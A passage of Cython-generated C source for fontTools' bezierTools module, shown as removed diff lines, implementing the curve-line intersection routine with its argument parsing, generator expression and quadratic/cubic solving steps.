CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve = 0; - PyObject *__pyx_v_line = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_line_intersections_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve,&__pyx_n_s_line,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1235, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_line)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1235, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_curve_line_intersections_t", 1, 2, 2, 1); __PYX_ERR(0, 1235, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_line_intersections_t") < 0)) __PYX_ERR(0, 1235, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_curve = values[0]; - __pyx_v_line = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_line_intersections_t", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1235, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(__pyx_self, __pyx_v_curve, __pyx_v_line); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1245, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_curve_line_intersections_t_loca, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 1245, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 1245, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1245, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1245, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_i); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_i, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = PyObject_RichCompare(__pyx_float_0_0, __pyx_cur_scope->__pyx_v_i, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_i, __pyx_int_1, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_i))) __PYX_ERR(0, 1245, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line) { - PyObject *__pyx_v_aligned_curve = NULL; - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_v_d = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - Py_ssize_t __pyx_t_6; - int __pyx_t_7; - PyObject *__pyx_t_8 = NULL; - PyObject *(*__pyx_t_9)(PyObject *); - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_line_intersections_t", 1); - - /* "fontTools/misc/bezierTools.py":1236 - * - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) # <<<<<<<<<<<<<< - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_alignment_transformation); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_4)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v_line}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_transformPoints); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (likely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_curve}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_aligned_curve = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1237 - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: # <<<<<<<<<<<<<< - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - */ - __pyx_t_6 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1237, __pyx_L1_error) - __pyx_t_7 = (__pyx_t_6 == 3); - if (__pyx_t_7) { - - /* "fontTools/misc/bezierTools.py":1238 - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) # <<<<<<<<<<<<<< - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_aligned_curve); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1238, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - __pyx_t_4 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_4); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_8 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_8); - index = 0; __pyx_t_3 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_1 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_1)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 2; __pyx_t_4 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_4)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_4); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_9(__pyx_t_8), 3) < 0) __PYX_ERR(0, 1238, __pyx_L1_error) - __pyx_t_9 = NULL; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_9 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1238, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_a = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_b = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_c = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1239 - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) # <<<<<<<<<<<<<< - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = __Pyx_GetItemInt(__pyx_v_c, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_10 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_t_1, __pyx_t_3, __pyx_t_8}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_5, 3+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __pyx_v_intersections = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1237 - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: # <<<<<<<<<<<<<< - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1240 - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - */ - __pyx_t_6 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1240, __pyx_L1_error) - __pyx_t_7 = (__pyx_t_6 == 4); - if (likely(__pyx_t_7)) { - - /* "fontTools/misc/bezierTools.py":1241 - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) # <<<<<<<<<<<<<< - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_aligned_curve); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_4, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_8))) || (PyList_CheckExact(__pyx_t_8))) { - PyObject* sequence = __pyx_t_8; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1241, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_4 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - __pyx_t_3 = PyList_GET_ITEM(sequence, 2); - __pyx_t_1 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_4,&__pyx_t_2,&__pyx_t_3,&__pyx_t_1}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_4,&__pyx_t_2,&__pyx_t_3,&__pyx_t_1}; - __pyx_t_10 = PyObject_GetIter(__pyx_t_8); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_9(__pyx_t_10); if (unlikely(!item)) goto __pyx_L6_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_9(__pyx_t_10), 4) < 0) __PYX_ERR(0, 1241, __pyx_L1_error) - __pyx_t_9 = 